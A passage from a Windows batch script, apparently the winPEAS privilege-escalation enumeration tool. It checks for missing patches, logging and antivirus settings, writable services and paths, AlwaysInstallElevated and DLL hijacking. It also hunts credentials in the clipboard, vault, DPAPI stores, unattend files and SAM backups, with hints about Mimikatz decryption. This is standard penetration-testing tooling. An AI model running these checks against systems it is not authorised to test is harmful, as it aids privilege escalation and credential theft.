"yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL 65 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) 66 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL 67 | IF "%expl%" == "yes" IF errorlevel 1 echo MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) 68 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL 69 | IF "%expl%" == "yes" IF errorlevel 1 echo MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo) 70 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL 71 | IF "%expl%" == "yes" IF errorlevel 1 echo MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys) 72 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL 73 | IF "%expl%" == "yes" IF errorlevel 1 echo MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free) 74 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL 75 | IF "%expl%" == "yes" IF errorlevel 1 echo MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS) 76 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL 77 | IF "%expl%" == "yes" IF errorlevel 1 echo MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager) 78 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL 79 | IF "%expl%" == "yes" IF errorlevel 1 echo MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) 80 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL 81 | IF "%expl%" == "yes" IF errorlevel 1 echo MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX) 82 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL 83 | IF "%expl%" == "yes" IF errorlevel 1 echo MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) 84 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL 85 | IF "%expl%" == "yes" IF errorlevel 1 echo MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) 86 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL 87 | IF "%expl%" == "yes" IF errorlevel 1 echo MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) 88 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL 89 | IF "%expl%" == "yes" IF errorlevel 1 echo MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP) 90 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL 91 | IF "%expl%" == "yes" IF errorlevel 1 echo MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) 92 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL 93 | IF "%expl%" == "yes" IF errorlevel 1 echo MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei) 94 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL 95 | IF "%expl%" == "yes" IF errorlevel 1 echo MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu) 96 | echo. 97 | echo. 98 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] DATE and TIME ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 99 | echo [i] You may need to adjust your local date/time to exploit some vulnerability 100 | date /T 101 | time /T 102 | echo. 103 | echo. 104 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Audit Settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 105 | echo [i] Check what is being logged 106 | REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 107 | echo. 108 | echo. 109 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WEF Settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 110 | echo [i] Check where are being sent the logs 111 | REG QUERY HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 112 | echo. 113 | echo. 114 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] LAPS installed? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 115 | echo [i] Check what is being logged 116 | REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 117 | echo. 118 | echo. 119 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] LSA protection? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 120 | echo [i] Active if "1" 121 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL 122 | echo. 123 | echo. 124 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Credential Guard? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 125 | echo [i] Active if "1" or "2" 126 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags 127 | echo. 128 | echo. 129 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WDigest? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 130 | echo [i] Plain-text creds in memory if "1" 131 | reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential 132 | echo. 133 | echo. 134 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Number of cached creds ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 135 | echo [i] You need System to extract them 136 | reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT 137 | echo. 138 | echo. 139 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] UAC Settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 140 | echo [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on 141 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access 142 | REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 143 | echo. 144 | echo. 145 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Registered Anti-Virus(AV) ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 146 | WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more 147 | echo. 148 | echo. 149 | echo Checking for defender whitelisted PATHS 150 | reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 151 | echo. 152 | echo. 153 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] PS settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 154 | echo PowerShell v2 Version: 155 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine /v PowerShellVersion 156 | echo PowerShell v5 Version: 157 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine /v PowerShellVersion 158 | echo Transcriptions Settings: 159 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription 160 | echo Module logging settings: 161 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging 162 | echo Scriptblog logging settings: 163 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 164 | echo. 165 | echo PS default transcript history 166 | dir %SystemDrive%\transcripts\ 167 | echo. 168 | echo Checking PS history file 169 | dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 170 | echo. 171 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] MOUNTED DISKS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 172 | echo [i] Maybe you find something interesting 173 | (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) 174 | echo. 175 | echo. 176 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] ENVIRONMENT ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 177 | echo [i] Interesting information? 178 | set 179 | echo. 180 | echo. 181 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] INSTALLED SOFTWARE ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 182 | echo [i] Some weird software? Check for vulnerabilities in unknow software installed 183 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software 184 | dir /b "C:\Program Files" "C:\Program Files (x86)" | sort 185 | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" 186 | reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\" 187 | IF exist C:\Windows\CCM\SCClient.exe echo SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading) 188 | echo. 189 | echo. 190 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Remote Desktop Credentials Manager ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 191 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager 192 | IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" echo Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files 193 | echo. 194 | echo. 195 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WSUS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 196 | echo [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) 197 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus 198 | reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" 199 | echo. 200 | echo. 201 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] RUNNING PROCESSES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 202 | echo [i] Something unexpected is running? Check for vulnerabilities 203 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes 204 | tasklist /SVC 205 | echo. 206 | echo [i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in) 207 | for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( 208 | for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do ( 209 | icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. 210 | ) 211 | ) 212 | echo. 213 | echo [i] Checking directory permissions of running processes (DLL injection) 214 | for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do ( 215 | icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. 216 | ) 217 | echo. 218 | echo. 219 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] RUN ^AT STARTUP ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 220 | echo [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary 221 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup 222 | ::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ 223 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ 224 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ 225 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ 226 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ 227 | icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 228 | icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 229 | icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 230 | icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 231 | icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 232 | icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 233 | icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 234 | icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 235 | schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab informa") 236 | echo. 237 | echo. 238 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] AlwaysInstallElevated? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 239 | echo [i] If '1' then you can install a .msi file with admin privileges ;) 240 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated 241 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul 242 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul 243 | echo. 244 | echo. 245 | echo. 246 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] NETWORK ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 247 | echo. 248 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CURRENT SHARES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 249 | net share 250 | echo. 251 | echo. 252 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] INTERFACES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 253 | ipconfig /all 254 | echo. 255 | echo. 256 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] USED PORTS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 257 | echo [i] Check for services restricted from the outside 258 | netstat -ano | findstr /i listen 259 | echo. 260 | echo. 261 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] FIREWALL ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 262 | netsh firewall show state 263 | netsh firewall show config 264 | echo. 265 | echo. 266 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] ^ARP ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 267 | arp -A 268 | echo. 269 | echo. 270 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] ROUTES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 271 | route print 272 | echo. 273 | echo. 274 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Hosts file ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 275 | type C:\WINDOWS\System32\drivers\etc\hosts | findstr /v "^#" 276 | echo. 277 | echo. 278 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CACHE DNS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 279 | ipconfig /displaydns | findstr "Record" | findstr "Name Host" 280 | echo. 281 | echo. 282 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WIFI ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 283 | echo [i] To get the clear-text password use: netsh wlan show profile key=clear 284 | netsh wlan show profile 285 | echo. 286 | echo. 287 | echo. 288 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^>[*] BASIC USER INFO ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 289 | echo [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege 290 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups 291 | echo. 292 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CURRENT USER ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 293 | net user %username% 294 | net user %USERNAME% /domain 2>nul 295 | whoami /all 296 | echo. 297 | echo. 298 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] USERS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 299 | net user 300 | echo. 301 | echo. 302 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] GROUPS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 303 | net localgroup 304 | echo. 305 | echo. 306 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] ADMINISTRATORS GROUPS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 307 | net localgroup Administrators 2>nul 308 | net localgroup Administradores 2>nul 309 | echo. 310 | echo. 311 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CURRENT LOGGED USERS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 312 | quser 313 | echo. 314 | echo. 315 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Kerberos Tickets ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 316 | klist 317 | echo. 318 | echo. 319 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CURRENT CLIPBOARD ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 320 | echo [i] Any password inside the clipboard? 321 | powershell -command "Get-Clipboard" 2>nul 322 | echo. 323 | echo. 324 | echo. 325 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] SERVICES VULNERABILITIES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 326 | ::echo. 327 | ::echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SERVICE PERMISSIONS WITH accesschk.exe FOR 'Authenticated users', Everyone, BUILTIN\Users, Todos and CURRENT USER ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 328 | ::echo [i] If Authenticated Users have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG or WRITE_DAC or WRITE_OWNER or GENERIC_WRITE or GENERIC_ALL, you can modify the binary that is going to be executed by the service and start/stop the service 329 | ::echo [i] If accesschk.exe is not in PATH, nothing will be found here 330 | ::echo [I] AUTHETICATED USERS 331 | ::accesschk.exe -uwcqv "Authenticated Users" * /accepteula 2>nul 332 | ::echo [I] EVERYONE 333 | ::accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul 334 | ::echo [I] BUILTIN\Users 335 | ::accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul 336 | ::echo [I] TODOS 337 | ::accesschk.exe -uwcqv "Todos" * /accepteula 2>nul 338 | ::echo [I] %USERNAME% 339 | ::accesschk.exe -uwcqv %username% * /accepteula 2>nul 340 | ::echo. 341 | ::echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SERVICE PERMISSIONS WITH accesschk.exe FOR * ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 342 | ::echo [i] Check for weird service permissions for unexpected groups" 343 | ::accesschk.exe -uwcqv * /accepteula 2>nul 344 | 345 | echo. 346 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SERVICE BINARY PERMISSIONS WITH WMIC + ICACLS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 347 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services 348 | for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( 349 | for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && echo. 350 | ) 351 | echo. 352 | echo. 353 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 354 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services 355 | for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && echo You can modify %%a 356 | echo. 357 | echo. 358 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] UNQUOTED SERVICE PATHS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 359 | echo [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' 360 | echo [i] The permissions are also checked and filtered using icacls 361 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services 362 | for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( 363 | for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( 364 | echo %%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo. 365 | ) 366 | ) 367 | ::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """ 368 | echo. 369 | echo. 370 | echo. 371 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] DLL HIJACKING in PATHenv variable ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 372 | echo [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations 373 | echo [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate 374 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking 375 | for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. ) 376 | echo. 377 | echo. 378 | echo. 379 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] CREDENTIALS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 380 | echo. 381 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WINDOWS VAULT ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 382 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault 383 | cmdkey /list 384 | echo. 385 | echo. 386 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] DPAPI MASTER KEYS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 387 | echo [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt 388 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi 389 | powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul 390 | powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul 391 | echo. 392 | echo. 393 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] DPAPI MASTER KEYS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 394 | echo [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt 395 | echo [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module 396 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi 397 | echo Looking inside %appdata%\Microsoft\Credentials\ 398 | dir /b/a %appdata%\Microsoft\Credentials\ 2>nul 399 | echo Looking inside %localappdata%\Microsoft\Credentials\ 400 | dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul 401 | echo. 402 | echo. 403 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Unattended files ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 404 | IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO %WINDIR%\sysprep\sysprep.xml exists. 405 | IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO %WINDIR%\sysprep\sysprep.inf exists. 406 | IF EXIST %WINDIR%\sysprep.inf ECHO %WINDIR%\sysprep.inf exists. 407 | IF EXIST %WINDIR%\Panther\Unattended.xml ECHO %WINDIR%\Panther\Unattended.xml exists. 408 | IF EXIST %WINDIR%\Panther\Unattend.xml ECHO %WINDIR%\Panther\Unattend.xml exists. 409 | IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO %WINDIR%\Panther\Unattend\Unattend.xml exists. 410 | IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO %WINDIR%\Panther\Unattend\Unattended.xml exists. 411 | IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO %WINDIR%\System32\Sysprep\unattend.xml exists. 412 | IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO %WINDIR%\System32\Sysprep\unattended.xml exists. 413 | IF EXIST %WINDIR%\..\unattend.txt ECHO %WINDIR%\..\unattend.txt exists. 414 | IF EXIST %WINDIR%\..\unattend.inf ECHO %WINDIR%\..\unattend.inf exists. 415 | echo. 416 | echo. 417 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SAM & SYSTEM backups ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 418 | IF EXIST %WINDIR%\repair\SAM ECHO %WINDIR%\repair\SAM exists. 419 | IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO %WINDIR%\System32\config\RegBack\SAM exists. 420 | IF EXIST %WINDIR%\System32\config\SAM ECHO %WINDIR%\System32\config\SAM exists. 421 | IF EXIST %WINDIR%\repair\SYSTEM ECHO %WINDIR%\repair\SYSTEM exists. 422 | IF EXIST %WINDIR%\System32\config\SYSTEM ECHO %WINDIR%\System32\config\SYSTEM exists. 423 | IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO %WINDIR%\System32\config\RegBack\SYSTEM exists. 424 | echo. 425 | echo. 426 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] McAffe SiteList.xml ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 427 | cd %ProgramFiles% 2>nul 428 | dir /s SiteList.xml 429 | cd %ProgramFiles(x86)% 2>nul 430 | dir /s SiteList.xml 431 | cd "%windir%\..\Documents and Settings" 2>nul 432 | dir /s SiteList.xml 433 | cd %windir%\..\Users 2>nul 434 | dir /s SiteList.xml 435 | echo. 436 | echo. 437 | echo 